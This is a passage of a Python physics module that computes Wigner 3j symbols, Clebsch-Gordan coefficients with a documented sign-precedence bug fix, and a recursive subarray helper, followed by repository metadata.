    three_j_sym *= sqrt(
        fact(j1 - m1) * fact(j1 + m1) * fact(j2 - m2) * fact(j2 + m2) *
        fact(j3 - m3) * fact(j3 + m3))
    # Racah sum over t, restricted so every factorial argument is >= 0.
    t_min = max(j2 - j3 - m1, j1 - j3 + m2, 0)
    t_max = min(j1 - m1, j2 + m2, j1 + j2 - j3)
    t_sum = 0
    for t in range(t_min, t_max + 1):
        t_sum += (-1.0 if t % 2 else 1.0) / (
            fact(t) * fact(j3 - j2 + m1 + t) * fact(j3 - j1 - m2 + t) *
            fact(j1 + j2 - j3 - t) * fact(j1 - m1 - t) * fact(j2 + m2 - t))
    three_j_sym *= t_sum
    return three_j_sym


# Clebsch-Gordan coefficients
# < j1 m1 j2 m2 | j3 m3 > = (-1)^{j1-j2+m3} \sqrt{2j3+1} ((j1 m1) (j2 m2) (j3 -m3))
def clebsch_gordan(jm1, jm2, jm3):
    r"""
    Calculate the Clebsch-Gordan coefficient

    .. math::
        \langle j_1 m_1 j_2 m_2 | j_3 m_3 \rangle = (-1)^{j_1-j_2+m_3} \sqrt{2 j_3 + 1}
        \begin{pmatrix}
            j_1 & j_2 & j_3\\
            m_1 & m_2 & -m_3
        \end{pmatrix}.

    Parameters
    ----------
    jm1 : tuple of integers
        (j_1 m_1)
    jm2 : tuple of integers
        (j_2 m_2)
    jm3 : tuple of integers
        (j_3 m_3)

    Returns
    -------
    cgcoeff : scalar
        Clebsch-Gordan coefficient.
    """
    j1, m1 = jm1
    j2, m2 = jm2
    j3, m3 = jm3
    # BUGFIX: the phase is (-1)^(j1 - j2 + m3).  The old expression
    # `j1 - j2 + m3 % 2` applied `%` only to m3 because of operator
    # precedence, giving the wrong sign, e.g. for (j1, j2, m3) = (2, 1, -1).
    sign = -1 if (j1 - j2 + m3) % 2 else 1
    return sign * sqrt(2 * j3 + 1) * three_j_symbol(jm1, jm2, (j3, -m3))
# Create subarray containing columns in idxlist
# e.g. idxlist = [(0),(2,3),(0,1,2,3)] gives
# column 0 for 1st dim,
# columns 2 and 3 for 2nd dim,
# columns 0,1,2 and 3 for 3rd dim.
def subarray(a, idxlist, n=None):
    r"""
    Extract a subarray from a matrix-like object.

    Parameters
    ----------
    a : matrix or array
    idxlist : list of tuples
        For each dimension, the columns that should be kept.
    n : integer, optional
        Internal recursion index (current axis); leave as None when calling.

    Returns
    -------
    subarray : matrix or array

    Examples
    --------
    idxlist = [(0), (2, 3), (0, 1, 2, 3)] gives
    - column 0 for 1st dim,
    - columns 2 and 3 for 2nd dim,
    - columns 0, 1, 2 and 3 for 3rd dim.
    """
    # Recurse from the last axis down to the first, fancy-indexing one axis
    # at a time while leaving the earlier axes untouched.
    if n is None:
        n = len(a.shape) - 1
    picked = a[tuple(slice(dim) for dim in a.shape[:n]) + (idxlist[n], )]
    if n == 0:
        return picked
    return subarray(picked, idxlist, n - 1)
| romerogroup/CondensedMatter_Jupyter | code/minimulti/electron/U_matrix.py | U_matrix.py | py | 19,979 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "numpy.zeros",
"line_number": 84,
"usage_type": "call"
},
{
"api_name": "itertools.product",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "functools.lru_cache",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.